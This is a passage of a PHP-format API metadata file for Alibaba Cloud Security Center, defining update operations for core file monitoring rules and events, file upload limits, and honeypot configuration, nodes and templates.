[ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ['errorCode' => '-107', 'errorMessage' => 'Invalid authorization status.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Update tamper-proofing rule status', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateFileProtectClientRuleStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\"\\n}","type":"json"}]', ], 'UpdateFileProtectEventStatus' => [ 'summary' => 'Modifies the status of core file monitoring events reported by the Security Center agent.', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '189056', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The IDs of the events.'."\n", 'type' => 'array', 'items' => ['description' => 'The ID of the event.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '315', 'title' => ''], 'required' => false, 'maxItems' => 500, 'title' => '', 'example' => '', ], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'The handling status of the event. Valid values:'."\n" ."\n" .'* **0**: unhandled'."\n" .'* **1**: handled'."\n" .'* **2**: added to the whitelist'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'enum' => ['0', '1', '2', '3'], 'title' => '', ], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the defense rule.'."\n", 'type' => 'string', 'required' => false, 'example' => 'tetsRule', 'title' => ''], ], [ 'name' => 'AlertLevels', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The severities of alerts.'."\n", 'type' => 'array', 'items' => ['description' => 'The severity of the alert. Valid values:'."\n" ."\n" .'1. high'."\n" .'2. medium'."\n" .'3. low'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => 'high', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The instance ID of the asset.'."\n", 'type' => 'string', 'required' => false, 'example' => 'i-bp1g6wxdwps7s9dz****', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.'."\n" ."\n" .'> You can call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to query the UUIDs of servers.'."\n", 'type' => 'string', 'required' => false, 'example' => 'eb2c782e-64f2-4590-a86c-d90164df****', 'title' => ''], ], [ 'name' => 'InstanceName', 'in' => 'query', 'schema' => ['description' => 'The name of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'InternetIp', 'in' => 'query', 'schema' => ['description' => 'The public IP address of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '120.27.XX.XX', 'title' => ''], ], [ 'name' => 'IntranetIp', 'in' => 'query', 'schema' => ['description' => 'The private IP address of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => '172.26.XX.XX', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The beginning of the time range to query. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1680919232000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end of the time range to query. Unit: milliseconds.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1649040221', 'title' => ''], ], [ 'name' => 'Operation', 'in' => 'query', 'schema' => ['description' => 'Type of operation on a file. eg:'."\n" ."\n" .'- **DELETE**: delete the file.'."\n" .'- **WRITE**: write the file.'."\n" .'- **READ**: read the file.'."\n" .'- **RENAME**: rename the file.'."\n" .'- **CHOWN**: set the file owner and file association group operations.', 'type' => 'string', 'required' => false, 'example' => 'READ', 'title' => ''], ], [ 'name' => 'SelectAllAcrossPages', 'in' => 'query', 'schema' => ['description' => 'Whether to choose all fields across industries.'."\n" ."\n" .'- **true**: yes'."\n" .'- **false**: no', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'C286491D-4A2F-589A-B63B-D2AD3DA9BD71'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C286491D-4A2F-589A-B63B-D2AD3DA9BD71\\"\\n}","type":"json"}]', 'title' => 'UpdateFileProtectEventStatus', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateFileProtectEventStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateFileProtectEventStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'UpdateFileProtectRemark' => [ 'summary' => 'Modify Alert Remarks', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the event.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1764', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The remarks.', 'type' => 'array', 'items' => ['description' => 'The remarks.', 'type' => 'string', 'required' => false, 'example' => 'Remark测试', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'IdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Event ID list.', 'type' => 'array', 'items' => ['description' => 'Event ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], 'required' => false, 'maxItems' => 500, 'title' => '', 'example' => '', ], ], [ 'name' => 'SelectAllAcrossPages', 'in' => 'query', 'schema' => ['description' => 'Cross-page select all indicator. Values:'."\n" .'- **true**: Yes'."\n" .'- **false**: No', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'Asset instance ID.'."\n", 'type' => 'string', 'required' => false, 'example' => 'i-bp1g6wxdwps7s9dz****', 'title' => ''], ], [ 'name' => 'AlertLevels', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'Alert notification level list.', 'type' => 'array', 'items' => ['description' => 'Alert notification level list. Values:'."\n" ."\n" .'1. high'."\n" .'2. medium'."\n" .'3. low', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => 'high', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'Server UUID.', 'type' => 'string', 'required' => false, 'example' => '5d55af3c-35f3-4d4d-8ccc-8c5443b0****', 'title' => ''], ], [ 'name' => 'InstanceName', 'in' => 'query', 'schema' => ['description' => 'Asset instance name.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'InternetIp', 'in' => 'query', 'schema' => ['description' => 'Public IP.', 'type' => 'string', 'required' => false, 'example' => '101.132.XX.XX', 'title' => ''], ], [ 'name' => 'IntranetIp', 'in' => 'query', 'schema' => ['description' => 'Private IP.', 'type' => 'string', 'required' => false, 'example' => '172.26.XX.XX', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'Start time timestamp.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1651290987000', 'title' => ''], ], [ 'name' => 'Operation', 'in' => 'query', 'schema' => ['description' => 'File operation type. Values:'."\n" ."\n" .'- **DELETE**: File deletion operation.'."\n" .'- **WRITE**: File write operation.'."\n" .'- **READ**: File read operation.'."\n" .'- **RENAME**: File rename operation.'."\n" .'- **CHOWN**: Set file owner and associated group operation.', 'type' => 'string', 'required' => false, 'example' => 'READ', 'title' => ''], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'Rule name.', 'type' => 'string', 'required' => false, 'example' => 'test-rule-1', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'End time timestamp.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1649040221', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of this request, which is a unique identifier generated by Alibaba Cloud for the request, and can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => '226440DF-DFCD-5B93-9951-FCF0A16A6B78'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"226440DF-DFCD-5B93-9951-FCF0A16A6B78\\"\\n}","type":"json"}]', 'title' => 'Modify Core File Monitoring Event Remarks', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateFileProtectRemark'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateFileProtectRemark', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'UpdateFileProtectRule' => [ 'summary' => 'Modifies the content of a core file monitoring rule based on the ID of the rule.', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '188815', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the rule.'."\n", 'type' => 'string', 'required' => true, 'example' => 'test-rule-1', 'title' => ''], ], [ 'name' => 'ProcPaths', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The paths to the monitored processes.'."\n", 'type' => 'array', 'items' => ['description' => 'The path to the monitored process.'."\n", 'type' => 'string', 'required' => false, 'example' => '/usr/local/*', 'title' => ''], 'required' => true, 'maxItems' => 50, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'FilePaths', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The paths to the monitored files. Wildcard characters are supported.'."\n", 'type' => 'array', 'items' => ['description' => 'The path to the monitored file. Wildcard characters are supported.'."\n", 'type' => 'string', 'required' => false, 'example' => '/usr/*', 'title' => ''], 'required' => true, 'maxItems' => 50, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'FileOps', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The operations that you want to perform on the files.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The operation that you want to perform on the file. Valid values:'."\n" ."\n" .'* WRITE'."\n" .'* READ'."\n" .'* DELETE'."\n" .'* RENAME'."\n" .'* CHMOD: changes permissions.'."\n", 'type' => 'string', 'required' => false, 'example' => 'WRITE', 'enum' => ['WRITE', 'READ', 'DELETE', 'RENAME', 'CHOWN'], 'title' => '', ], 'required' => true, 'maxItems' => 100, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => [ 'description' => 'The handling method of the rule. Valid values:'."\n" ."\n" .'* pass: allow'."\n" .'* alert'."\n", 'type' => 'string', 'required' => false, 'example' => 'pass', 'enum' => ['alert', 'pass'], 'title' => '', ], ], [ 'name' => 'AlertLevel', 'in' => 'query', 'schema' => [ 'description' => 'The severity of alerts. Valid values:'."\n" ."\n" .'* 0: does not generate alerts'."\n" .'* 1: sends notifications'."\n" .'* 2: suspicious'."\n" .'* 3: high-risk'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'enum' => ['0', '1', '2', '3'], 'title' => '', ], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'The status of the rule. Valid values:'."\n" ."\n" .'* **0**: disabled'."\n" .'* **1**: enabled'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'enum' => ['0', '1'], 'title' => '', ], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1062', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '339227F4-C9E1-526F-8347-1099C11F65FB'], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"339227F4-C9E1-526F-8347-1099C11F65FB\\"\\n}","type":"json"}]', 'title' => 'UpdateFileProtectRule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateFileProtectRule'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateFileProtectRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ClientFileProtect', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:clientfileprotect/{#RuleId}'], ], ], ], ], ], 'UpdateFileUploadLimit' => [ 'methods' => ['post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '177934', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Limit', 'in' => 'query', 'schema' => ['description' => 'The QPS throttling threshold for file uploads from the client. Valid values: 100 to 10000.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '100', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'result', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The ID of the request, which is a unique identifier that Alibaba Cloud generates for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F'], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidParam', 'errorMessage' => 'There was an error with your request.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Modify the QPS upper limit for client file uploads', 'summary' => 'Modifies the QPS for client file uploads.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateFileUploadLimit', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'FileUploadLimit', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:fileuploadlimit'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F\\"\\n}","type":"json"}]', ], 'UpdateHoneypot' => [ 'summary' => 'Modifies the configuration of a specified honeypot.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'Meta', 'in' => 'query', 'schema' => ['description' => 'The custom configuration of the honeypot.'."\n" .'>The value of this parameter is obtained from the **Template** field returned by the [ListAvailableHoneypot](~~ListAvailableHoneypot~~) operation.', 'type' => 'string', 'required' => false, 'example' => '{\\"burp\\":\\"open\\",\\"webshell\\":\\"open\\",\\"trojan_git\\":\\"close\\",\\"portrait_option\\":\\"true\\"}', 'title' => ''], ], [ 'name' => 'HoneypotId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The honeypot ID.'."\n" .'> You can call the [ListHoneypot](~~ListHoneypot~~) operation to obtain this value.', 'type' => 'string', 'required' => true, 'example' => '945607c2ae2a1a737c04599d6608065688bfc6048d9b9d306ce8dc8191c*****'], ], [ 'name' => 'HoneypotName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The custom name of the honeypot.', 'type' => 'string', 'required' => false, 'example' => 'ExtMail'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The honeypot information.', 'type' => 'object', 'properties' => [ 'HoneypotId' => ['title' => '', 'description' => 'The honeypot ID.', 'type' => 'string', 'example' => '9bf8cd373112263d4bc102fc5dba9d9f812ee05d4d35c487d330d52e937f****'], 'HoneypotName' => ['title' => '', 'description' => 'The custom name of the honeypot.', 'type' => 'string', 'example' => 'hyl-phpmyadmin'], 'HoneypotImageName' => ['title' => '', 'description' => 'The name of the honeypot image.', 'type' => 'string', 'example' => 'webpage'], 'PresetId' => ['title' => '', 'description' => 'The ID of the custom honeypot parameter.', 'type' => 'string', 'example' => '868a7579-00b5-4a74-999d-8bd3f411e8a3'], 'State' => [ 'title' => '', 'description' => 'The status of the honeypot.', 'type' => 'array', 'items' => ['description' => 'The status of the honeypot.', 'type' => 'string', 'example' => 'running', 'title' => ''], 'example' => '', ], 'HoneypotImageDisplayName' => ['title' => '', 'description' => 'The display name of the honeypot image.', 'type' => 'string', 'example' => 'Webmin'], 'NodeId' => ['title' => '', 'description' => 'The unique ID of the management node.', 'type' => 'string', 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '3B323ADD-6CF8-51F6-9047-2F0A4E3F5EFD', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the response.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify honeypot configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateHoneypot', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneyPot', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypot/{#HoneypotId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"HoneypotId\\": \\"9bf8cd373112263d4bc102fc5dba9d9f812ee05d4d35c487d330d52e937f****\\",\\n \\"HoneypotName\\": \\"hyl-phpmyadmin\\",\\n \\"HoneypotImageName\\": \\"webpage\\",\\n \\"PresetId\\": \\"868a7579-00b5-4a74-999d-8bd3f411e8a3\\",\\n \\"State\\": [\\n \\"running\\"\\n ],\\n \\"HoneypotImageDisplayName\\": \\"Webmin\\",\\n \\"NodeId\\": \\"a882e590-b87b-45a6-87b9-d0a3e5a0****\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"3B323ADD-6CF8-51F6-9047-2F0A4E3F5EFD\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'UpdateHoneypotNode' => [ 'summary' => 'Updates a specified honeypot management node.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'NodeName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the management node.', 'type' => 'string', 'required' => true, 'example' => 'HoneypotNodeTest'], ], [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the management node.'."\n" .'>You can call the [ListHoneypotNode](~~ListHoneypotNode~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '67ab3f4c-3db5-4fc3-b51f-00f8bfabfa08'], ], [ 'name' => 'SecurityGroupProbeIpList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of allowed CIDR blocks.', 'type' => 'array', 'items' => ['description' => 'The allowed CIDR block.', 'type' => 'string', 'required' => false, 'example' => '10.0.0.0/24', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'AvailableProbeNum', 'in' => 'query', 'schema' => ['description' => 'The number of available probes.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" ."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '753D92B3-A062-544F-8E7B-C813AA9FA9FC', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request result.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidParam', 'errorMessage' => 'There was an error with your request.', 'description' => ''], ['errorCode' => 'NeedBuy', 'errorMessage' => 'This service shoule be purchased first.', 'description' => ''], ['errorCode' => 'AuthorizedProbeCannotReduce', 'errorMessage' => 'The number of authorized probes cannot be reduced.', 'description' => ''], ['errorCode' => 'InvalidProbeNum', 'errorMessage' => 'Invalid number of probes.', 'description' => ''], ['errorCode' => 'ProbeNumInsufficient', 'errorMessage' => 'The number of probes remaining is insufficient.', 'description' => ''], ['errorCode' => 'NodeNotExist', 'errorMessage' => 'The control node does not exist.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'Service error, please try again later.', 'description' => ''], ], ], 'title' => 'Update a honeypot management node', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateHoneypotNode', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotNode', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotnode/{#NodeId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"753D92B3-A062-544F-8E7B-C813AA9FA9FC\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'UpdateHoneypotPreset' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasZLVTBH'], ], 'parameters' => [ [ 'name' => 'HoneypotImageName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the honeypot image.', 'type' => 'string', 'required' => false, 'example' => 'metabase'], ], [ 'name' => 'PresetName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The custom name of the honeypot template.', 'type' => 'string', 'required' => false, 'example' => 'apc_web_python'], ], [ 'name' => 'HoneypotPresetId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The unique ID of the honeypot template.'."\n" .'>You can call the [ListHoneypotPreset](~~ListHoneypotPreset~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'f75eddce-e9d3-4a88-af95-b10b6f65xxxx'], ], [ 'name' => 'Meta', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The custom parameters of the honeypot template. The value is a JSON string that contains the following fields:'."\n" .'- **portrait_option**: social tracing'."\n" .'- **burp**: Burp countermeasure'."\n" .'- **trojan_git**: Git countermeasure.', 'type' => 'string', 'required' => false, 'example' => '{"portrait_option":true,"burp":"open"}'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content in the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of a failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The 